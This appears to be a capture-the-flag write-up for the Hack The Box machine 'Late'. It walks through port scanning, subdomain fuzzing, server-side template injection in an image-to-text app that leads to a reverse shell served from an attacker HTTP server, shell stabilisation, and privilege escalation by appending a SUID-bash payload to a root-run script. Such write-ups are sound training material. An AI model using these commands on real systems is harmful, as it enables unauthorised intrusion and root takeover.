Skip to content

Latest commit

 

History

History
134 lines (68 loc) · 3.08 KB

README.md

File metadata and controls

134 lines (68 loc) · 3.08 KB
Raw

Late

nmap -p- --min-rate 10000 10.10.11.156 -Pn

alt text

After detection of open ports, let's do greater nmap scan for these ports.

nmap -A -sC -sV -p22,80 10.10.11.156 -Pn

alt text

From website enumeration, I see that for Contact there's late.htb domain name is used , let's add this domain into /etc/hosts file for resolving purposes.

Let's do subdomain enumeration for our target.

ffuf -u http://late.htb/ -H "Host: FUZZ.late.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 9461

alt text

I found images.late.htb domain name, let's add this also into /etc/hosts file.

This web application is like that used for converting images to text.

alt text

By analyzing application, I see that there's Jinja template is used, if I upload image contains SSTI (Server-Side Template Injection) payload, it can work.

Let's add this below payload image.

alt text

I see the result,

alt text

Let's add image which contains reverse shell payload, it will go through like below way.

1.First, we need to create bash script that's reverse shell actually.

alt text

2.Next, we need to open python http server to serve this file.

python3 -m http.server --bind 10.10.14.7 8080

alt text

3.Next, we need to submit below image into web application.

alt text

Hola! I got reverse shell from port (1337).

alt text

Let's make interactive shell via below commands.

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
export SHELL=bash

alt text

user.txt

alt text

For privilege escalation, let's add pspy64 into machine to gather information about background jobs.

alt text

There's script called ssh-alert.sh, let's read content of this file.

alt text

Despite that svc_acc user is owner of this script, however cannot do any overwrite to this file.

alt text

alt text

Let's look at attribute of this file via lsattr command.

alt text

There's a letter is used, it means we can only append something to this file.

Let's append our malicious shell command into here which is copying /bin/bash file and give to this SUID privilege

echo -e "cp /bin/bash /tmp/dr4ks\nchmod 4777 /tmp/dr4ks" >> /usr/local/sbin/ssh-alert.sh

alt text

Let's see our dr4ks file which is copied /bin/bash file and execute this via -p option to get root shell.

alt text

Note: This script works only after successful login to svc_acc user, but we don't know password of this user, we can login into this target app by stealing id_rsa file of this user.

alt text

root.txt

alt text